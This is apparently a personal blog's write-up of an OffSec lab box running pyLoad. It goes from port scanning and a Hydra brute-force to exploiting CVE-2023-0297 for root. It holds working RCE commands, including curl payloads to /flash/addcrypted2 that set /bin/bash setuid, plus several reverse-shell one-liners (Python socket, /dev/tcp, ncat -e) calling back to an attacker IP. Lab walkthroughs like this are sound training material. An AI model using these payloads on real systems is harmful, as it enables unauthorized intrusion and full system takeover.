22 Mar, 2024

#reconnaissance #open #ports #services

pyLoader

Performed reconnaissance on target IP, identified open ports, and checked services running on those ports. Discovered a potential exploit for the pyLoad application. Successfully executed a remote code execution (RCE) exploit on the target. Gained a reverse shell on the target system.

Preston Zen

prestonzen.com

Nov 10 2023

Target:

192.168.181.26

Prep

Open Resources

General Mind Map:
https://xmind.app/m/QsNUEz/

Confirm docker is installed and set rustscan as an alias or add to bashrc / fish config due to it being able to scan all ports and services in 10 seconds

alias rustscan='sudo docker run -it --rm --name rustscan rustscan/rustscan:2.1.1 -a'

Create directory for target and enter it

mkdir ClamAV
cd ClamAV

Prep a nc listener

nc -nlvp 4444

Confirm ip address

hostname -I

192.168.45.241

Recon

Start with a quick open port scan

rustscan 192.168.181.26

22/tcp open ssh syn-ack
9666/tcp open zoomcp syn-ack

Quick OS check

sudo nmap -O --top-ports 1000 -v -T4 192.168.181.26 -oN osType.nmap

No exact OS matches for host

Follow up with a service scan on those open ports

sudo nmap -sC -sV -p22,9666 -v -T5 192.168.181.26 -oN services.nmap

PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.9p1 Ubuntu 3ubuntu0.1 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 256 b9bc8f013f855df95cd9fbb615a01e74 (ECDSA)
|_ 256 53d97f3d228afd5798fe6b1a4cac7967 (ED25519)
9666/tcp open http CherryPy wsgiserver
| http-robots.txt: 1 disallowed entry
|/
| http-methods:
| Supported Methods: GET OPTIONS HEAD
| http-title: Login - pyLoad
|_Requested resource was /login?next=http://192.168.181.26:9666/
|_http-server-header: Cheroot/8.6.0
|_http-favicon: Unknown favicon MD5: 71AAC1BA3CF57C009DA1994F94A2CC89
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Port 22 - ssh

Skip for now

Port 9666 http

9666/tcp open http CherryPy wsgiserver
| http-robots.txt: 1 disallowed entry
|/
| http-methods:
| Supported Methods: GET OPTIONS HEAD
| http-title: Login - pyLoad
|_Requested resource was /login?next=http://192.168.181.26:9666/
|_http-server-header: Cheroot/8.6.0
|_http-favicon: Unknown favicon MD5: 71AAC1BA3CF57C009DA1994F94A2CC89
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

nmap -sV --script "http-*" -p 9666 -T5 192.168.181.26 -oN http9666.nmap

...long scan...

Kernel Exploits

searchsploit Cheroot 8.6.0

Exploits: No Results
Shellcodes: No Results

Target URL:

http://192.168.181.26:9666

An image to describe post
Login page
Source Code shows nothing

Check for non-navigable directories

dirbuster

Run at 50 threads
Word list location:

/usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt

Only the root directory was found. Low socket connection rate so easy to DOS

Default creds
admin:admin
admin:password
Nope

Hydra bruteforce in background with admin as a try

hydra -l admin -P /usr/share/wordlists/rockyou.txt 192.168.181.26 -s 9666 http-post-form "/admin/login.php:username=^USER^&password=^PASS^:Incorrect username/email or password."

Hydra is good when it works...

Check service exploit

searchsploit pyload

Exploit Title | Path
PyLoad 0.5.0 - Pre-auth Remote Code Execution (RCE) | python/webapps/51532.py
Potential RCE found

searchsploit -p 51532

Exploit: PyLoad 0.5.0 - Pre-auth Remote Code Execution (RCE)
URL: https://www.exploit-db.com/exploits/51532
Path: /snap/searchsploit/387/opt/exploitdb/exploits/python/webapps/51532.py
Codes: CVE-2023-0297
Verified: True
File Type:

cp /snap/searchsploit/387/opt/exploitdb/exploits/python/webapps/51532.py .

Check exploit
An image to describe post
Uses requests to send a exploit packet to the /flash/addcrypted2* endpoint

Confirmed this URL exists
An image to describe post

Learn Exploit

python 51532.py -h

usage: 51532.py [-h] -u URL -c CMD
optional arguments:
-h, --help show this help message and exit
-u URL Target url.
-c CMD Command to execute.

Run exploit

python 51532.py -u http://192.168.181.26:9666 -c id

An image to describe post
Confirm exploit worked since this seems like a blind confirmation

Retry with reverse shell. Python is fitting due to pyLoad
https://revshells.com
My IP: 192.168.45.241

python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.45.241",4444));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import pty; pty.spawn("sh")'

Run it (remove trailing /

python 51532.py -u http://192.168.181.26:9666 -c "python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.45.241",4444));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import pty; pty.spawn("sh")'"

Nope
Keep trying revshells until one takes
sh -i >& /dev/tcp/192.168.45.241/4444 0>&1

python 51532.py -u http://192.168.181.26:9666 -c "sh -i >& /dev/tcp/192.168.45.241/4444 0>&1"

Need to remember to quote "the command"

ncat seems to be on target server

python 51532.py -u http://192.168.181.26:9666 -c "ncat 192.168.45.241 4444 -e sh"

An image to describe post

curl method to deliver the payload from a russian fourm

curl -i -s -k -XPOST --data-binary 'jk=pyimport%20os;os.system("chmod%20u%2bs%20/bin/bash");f=function%20f2(){};&package=xxx&crypted=AAAA&&passwords=aaaa' 'http://192.168.181.26:9666/flash/addcrypted2'

https://attackerkb.com/topics/4G0gkUrtoR/cve-2023-0297

Message shown if it is vulnerable
An image to describe post
Could not decrypt key

Now try a reverse shell

curl -i -s -k -XPOST --data-binary 'jk=pyimport%20os;os.system("ncat%20192.168.45.241%204444%20-e%20bash");f=function%20f2(){};&package=xxx&crypted=AAAA&&passwords=aaaa' 'http://192.168.181.26:9666/flash/addcrypted2'

Still closees upon connection

curl -i -s -k -XPOST --data-binary 'jk=pyimport%20os;os.system("ncat%20192.168.45.241%204444%20-e%20/bin/sh%20-c%20'echo%20WHOAMI:%20$(whoami)'");f=function%20f2(){};&package=xxx&crypted=AAAA&&passwords=aaaa' 'http://192.168.181.26:9666/flash/addcrypted2'

Nope

Offsec says this curl connection test works...

curl 192.168.45.241:4444

At least now it doesn't auto close and takes in one input but I do see the output

Recommended to use /bin/bash for revshells as it's more stable

ncat -e /bin/bash 192.168.45.241 4444

Will try with the exploit script

python 51532.py -u http://192.168.181.26:9666 -c "ncat -e /bin/bash 192.168.45.241 4444"

We're in

Check Privileges

whoami && id

root
uid=0(root) gid=0(root) groups=0(root)

Upgrade the shell for something more stable

python3 -c 'import pty; pty.spawn("/bin/bash")'

Actions On Objectives

For non-privileged access proof dump

echo " "; echo "local:"; find / -type f -name "local.txt" 2>/dev/null | xargs cat 2>/dev/null;

Dump all local, user, network, and proof info.

echo " "; echo "uname -a:"; uname -a; \
echo " "; echo "hostname:"; hostname; \
echo " "; echo "id"; id; \
echo " "; echo "ifconfig:"; /sbin/ifconfig -a; \
echo " "; echo "proof:"; cat /root/proof.txt 2>/dev/null; cat /Desktop/proof.txt 2>/dev/null; echo " "

An image to describe post
Submit hash(s)
cf9ba6ea74a7f88b3b9d3ec9e7d9a254

DEL

pyLoader

Prep

Open Resources

Recon

Port 22 - ssh

Port 9666 http

Actions On Objectives

Offsec - BTRSys2.1 - Nov 4th 2023

Offsec - Codo - Oct 31st 2023

Dawn

Offsec - CyberSploit1 - Apr 20th 2023

Offsec - Levram - Nov 1st 2023

Offsec - ICMP - Nov 4th 2023